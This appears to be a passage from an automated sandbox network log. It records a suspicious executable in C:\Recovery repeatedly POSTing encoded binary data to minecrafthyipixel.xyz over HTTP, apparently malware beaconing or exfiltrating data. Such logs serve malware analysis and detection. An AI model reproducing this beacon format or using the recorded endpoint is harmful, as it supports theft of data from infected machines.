                                                                                                                                    Apr 19, 2024 13:43:39.652947903 CEST2512OUTData Raw: 57 54 5b 5e 5c 44 54 5a 5c 5e 59 59 57 53 58 5c 54 53 5f 57 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[^\DTZ\^YYWSX\TS_WTXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^1X6R +,X&0($8-P?8&:8U1("Q#15*(7^",/%$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:40.021022081 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:39 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=actJndEBZK9xfKjdvqJP%2BbjX6rzsErmCIpnsCTIJnuudhoQlomSIQgctfZUpiiIYfczGv0rFPVxXyAlHCyXA%2Banph9GgSu6f9B%2BmAw0NAwXU%2B1ngqEs36pKe7Yfm3wNmhY3ZAxcnppU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3608bba7be2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:40.021117926 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    104192.168.2.449854104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:40.249349117 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:40.353858948 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:40.355811119 CEST2512OUTData Raw: 52 5e 5e 58 5c 46 54 5f 5c 5e 59 59 57 5f 58 5b 54 52 5f 5b 54 5e 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^X\FT_\^YYW_X[TR_[T^S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>%"+$;0;=;#&9,%+*7!*(7 <$-%$[. X
                                                                                                                                    Apr 19, 2024 13:43:40.708277941 CEST629INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:40 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BfS%2B5NIFPLwxcj2tI2xuxOBjlUF%2BoRPztjHy9eelKbUrUdgRwnXKX%2BkUALWgZjoKPTP9EgbqGG%2B04wseXoi0D80N4%2F0d%2BIWZnUhxYDMzUg2XQ1VhNLTQlcgP2f6vbVk%2FbPIRvjnUE30%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca364ee5a452d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:40.708338976 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    105192.168.2.449855104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:40.936512947 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:41.041160107 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:41.041522980 CEST2512OUTData Raw: 57 5d 5e 59 59 4a 54 5b 5c 5e 59 59 57 5f 58 5e 54 52 5f 56 54 58 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^YYJT[\^YYW_X^TR_VTXSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\166 '07^%;%U=Y&#$+&Q!""*#$[/%$[. X
                                                                                                                                    Apr 19, 2024 13:43:41.399600029 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:41 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oy4wSRZn5jo2cEQ2Fx4MqAFRGe6a0SIsNHdZ5r8aj1VqhNSqb0WJaI8CZ8ugwtRbpl9rHCjU0Evecwd1KZ3DYpY5qRaoj%2BSElyrAG4SVJHJhwtJNsF9m71ZA7d7SoWceS%2FJd8y3E%2B08%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3693b84ad94-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:41.399665117 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    106192.168.2.449856104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:41.624532938 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:41.729137897 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:41.729377985 CEST2512OUTData Raw: 57 5c 5e 5e 59 44 51 59 5c 5e 59 59 57 54 58 5c 54 5a 5f 5e 54 5a 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^^YDQY\^YYWTX\TZ_^TZS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\%*"?3#$';V*(2:8U2 2))]?#:5$[. X )
                                                                                                                                    Apr 19, 2024 13:43:42.021167040 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:41 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8H%2BCDhMk9P5T67curWEG%2BDxwzBibaB9D%2FToOJ%2F076InJZamy00hyijUh%2BL965t7lFiWeJGqGSz1U3sbuK%2FUMqSk85KFDb3DwZMSj46U4wn0qywzY9hw9g1qllVqlp%2FJOZACPMpSJZ6M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca36d7a4a69f7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:42.021229982 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    107192.168.2.449857104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:42.255676031 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:42.360510111 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:42.360666990 CEST2504OUTData Raw: 57 55 5b 59 59 4a 51 5d 5c 5e 59 59 57 57 58 53 54 52 5f 59 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[YYJQ]\^YYWWXSTR_YTUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[26T!+([&#+Z$-T=;X'*/&"R T)++4"<<:%$[. X
                                                                                                                                    Apr 19, 2024 13:43:42.727601051 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:42 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EJJr6Wdrr0XC9NulWt8ijy7B%2FE8unOw8pPGLh%2FIku4gEKt2OBEQIqW7nHpvMU5icLZ4AwHIDJb2RumvS0ONDbPaOTcqskygajfiYIEU0k9UQMluVsy7xReudx60YUx9BSJl1OJu%2FZwA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3716e1d44d2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:42.727665901 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    108192.168.2.449858104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:42.954305887 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:43.059529066 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:43.059720993 CEST2512OUTData Raw: 57 5c 5e 5e 59 47 54 5c 5c 5e 59 59 57 5e 58 5d 54 56 5f 5d 54 5a 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^^YGT\\^YYW^X]TV_]TZSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1*S6; 0\'+)Q*2#%;2Q "&)"<89$[. X
                                                                                                                                    Apr 19, 2024 13:43:43.310870886 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:43 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8HEFs3k6MaG53571%2F2PYDKSJhj2UNNncx3UMxalPBcxKwGQSlfCiueuqaZuo1b%2Bttq%2Bsef0IU9SOdgQ5o60dhfhDfoE7uv1FKvMPZKFuUdTS%2BN9LK8QXAOhZazjz4w5%2BOLTxxNNhDM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca375cc5eadb3-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:43.310934067 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    109192.168.2.449859104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:43.547169924 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:43.651573896 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:43.651904106 CEST2512OUTData Raw: 57 5f 5b 5b 5c 46 51 5a 5c 5e 59 59 57 53 58 5e 54 53 5f 59 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[[\FQZ\^YYWSX^TS_YT^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1&T"(<\& ;\0+5T=+&)$S%;!16T>;/7[/5$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:44.004384041 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:43 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gcxhCz0DoOMx%2F%2FwBM5Jc1YTdPwD22HwbOegw7MtSDC3dYSBpnUGUeHKY4VlaDJa3IuYexjnGfdzlRT8XeQ8GXh1QN7mizb3%2FD3qFWt1m%2FWs5Rv%2BsqvidGM%2BjAVNn%2B9KkKFQWwFrjZXg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3798a2053bb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:44.004411936 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    110192.168.2.449861104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:44.240638971 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:44.345274925 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:44.345418930 CEST2512OUTData Raw: 57 58 5e 59 59 47 54 5c 5c 5e 59 59 57 51 58 58 54 56 5f 5c 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^YYGT\\^YYWQXXTV_\T_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&..6; $005Q*;#Y&;%W42) 4<#.$[. X =
                                                                                                                                    Apr 19, 2024 13:43:44.608484983 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:44 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I02OcwB%2FoEzsdG31PEfiCGV0ZUUzt89ipdvfDFTxp9MGifckVOcRUBqnBuOgh3KnLfiSwrRzLY0A%2FPrrHUlgBHITBTf8JdM9gaF67WPX24Nh3QU8evpdbshP%2FlGE%2BiYn2fSKA8B2udI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca37ddd28071d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:44.608544111 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    111192.168.2.449862104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:44.831482887 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:44.935870886 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:44.936037064 CEST2504OUTData Raw: 57 5e 5e 5b 59 42 54 5d 5c 5e 59 59 57 57 58 59 54 55 5f 5c 54 5c 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^[YBT]\^YYWWXYTU_\T\SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1"++$0$+>)#\&#&V!"=)(7"/,^/%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:45.291505098 CEST629INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:45 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dFdJ1%2BXM6ms6H8XVkYELY1SHKex%2FwPP4SpqL9DYn4fDbTvMtJtk%2BBB6sb%2B1By6pA%2Fx2z1ii%2F83AGJthMNbDJE847J%2BEiQGXafgb9wmrpEJdMrlZvtLmmqk3mhSQ3f0fcPv9OHC%2FgBs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3818c5312f5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:45.291563988 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    112192.168.2.449863104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:45.516130924 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:45.620919943 CEST25INHTTP/1.1 100 Continue
